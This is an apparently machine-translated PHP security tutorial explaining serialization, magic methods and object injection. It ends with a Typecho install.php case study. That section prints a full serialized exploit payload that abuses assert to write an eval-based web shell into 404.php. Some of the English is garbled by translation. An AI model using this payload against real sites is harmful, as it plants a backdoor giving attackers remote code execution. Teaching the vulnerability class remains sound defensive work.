* serialize   
* Converts an object to a string

* Deserialization
* Converts a string of a specific format to an object
What is a deserialization vulnerability

*
PHP The deserialization vulnerability is also known as PHP Object injection , It's a very common vulnerability , This type of vulnerability is difficult to exploit , But once used successfully, it will cause very dangerous consequences . The root cause of the vulnerability is that the program does not detect the user input deserialized string , The result is that the deserialization process can be controlled maliciously , This results in code execution ,getshell And a series of uncontrollable consequences . A deserialization vulnerability is not PHP specific , Also exist in Java,Python And so on , But its principle is basically the same .

* When creating a general program , Both destructors and constructors are overridden , Deserialization is the use of these rewritten functions .
Deserializing function

* php Two functions in :
* 1,serialize()
* 2,unserialize()

* 1,serialize()
* When in php After creating an object in , Can pass serialize() Turn this object into a string , Save the value of the object to facilitate the later transfer and use .

* 2,unserialize()
* And serialize()
Corresponding ,unserialize() Can be created from a stored representation PHP Value of , As far as the environment concerned this time is concerned , The object can be recovered from the serialized result (object

* example :
* $arr=array();
* $arr['name']=' Zhang San ';
* $arr['age']='22';
* $arr['sex']=' male ';
* $arr['phone']='123456789';
* $arr['address']=' Pudong New Area, Shanghai ';
* var_dump($arr);
* output :
*   array(5) {
*   ["name"]=> string(6) " Zhang San "
*   ["age"]=> string(2) "22"
*   ["sex"]=> string(3) " male "
*   ["phone"]=> string(9) "123456789"
*   ["address"]=> string(21) " Pudong New Area, Shanghai "
*    }
* serialize :
* $info=serialize($arr);
* var_dump($info);
* output :
* string(140)
"a:5:{s:4:"name";s:6:" Zhang San ";s:3:"age";s:2:"22";s:3:"sex";s:3:" male ";s:5:"phone";s:9:"123456789";s:7:"address";s:21:" Pudong New Area, Shanghai ";}"
* a:5 Flag serialized as array contain 5 Key value pairs ,s:4 Flag content is string containing 4 Characters .
* $zhangsan=unserialize($info);
* var_dump($zhangsan);
* output :
* array(5) {
* ["name"]=> string(6) " Zhang San "
* ["age"]=> string(2) "22"
* ["sex"]=> string(3) " male "
* ["phone"]=> string(9) "123456789"
* ["address"]=> string(21) " Pudong New Area, Shanghai "
*  }
Magic Methods

* Magic Function"
* yes php A class of special methods in the field of Mathematics

* __construct():
* When an object is created (new) Is called automatically when the . But in unserialize() Is not automatically called .( Constructors )

* __destruct():
* Called automatically when the object is destroyed .( Destructor )

* __wakeup():
* unserialize() Is called automatically when the .

* __wakeup()
* use unserialize Trigger when

* __sleep()
* use serialize Trigger when

* __destruct()
* Triggered when an object is destroyed

* __call()
* Triggering an invocable method in an object context

* __callStatic()
* Triggering an invocable method in a static context

* __get()
* Used to read data from inaccessible properties

* __set()
* Used to write data to an inaccessible property

* __isset()
* Called on an inaccessible property isset() or empty() trigger

* __unset()
* Use on inaccessible properties unset() Trigger when

* __toString()
* Triggered when a class is used as a string

* __invoke()
* Triggered when a script attempts to call an object as a function
Typecho Deserialization vulnerability

* Typecho:
* It's a simple one , Lightweight blog program . be based on PHP, Using multiple databases (Mysql,PostgreSQL,SQLite) Store data . stay GPL Version
2 Issued under license , Is an open source program , Currently used SVN To do version management .

* Typecho loophole :
* 1, Root site vulnerability ,install.php file .
* 2, Find the vulnerability location of the website , Used ‘unserialize’ Function to deserialize the received ‘__typecho_config’ parameter .
* 3, Trace to constructor according to source code and use .

* Typecho utilize
*
a:2:{s:7:"adapter";O:12:"Typecho_Feed":4:{s:19:"Typecho_Feed_type";s:8:"ATOM
1.0";s:22:"Typecho_Feed_charset";s:5:"UTF-8";s:19:"Typecho_Feed_lang";s:2:"zh";s:20:"Typecho_Feed_items";a:1:{i:0;a:1:{s:6:"author";O:15:"Typecho_Request":2:{s:24:"Typecho_Request_params";a:1:{s:10:"screenName";s:57:"file_put_contents(’404.php',
'<?php
@eval($_POST[i]);?>')";}s:24:"Typecho_Request_filter";a:1:{i:0;s:6:"assert";}}}}}s:6:"prefix";s:7:"typecho";}
Repair and defense

* Like most vulnerabilities , The problem of deserialization is also caused by the control of user parameters , So a good preventive measure is not to put the user's input or controllable parameters directly into the deserialization operation .

Technology
©2020 ioDraw All rights reserved
【webpack】DLL plugin Principle analysis Combined with source code Transformer The most comprehensive , The deepest analysis filemanager-webpack-plugin Turn resources into zip Package and archive JavaScript study ( Function declaration and parameters ) mean value - Implementation and application of variance model _python_ Data analysis _9JAVA Snake games ( Source code + notes )SpringBoot integrate Redisson Implement delay queue python code , Easy to complete Snake games Thread.setDaemon Set up the Daemons Unity Code dynamic creation of preform in editor expansion function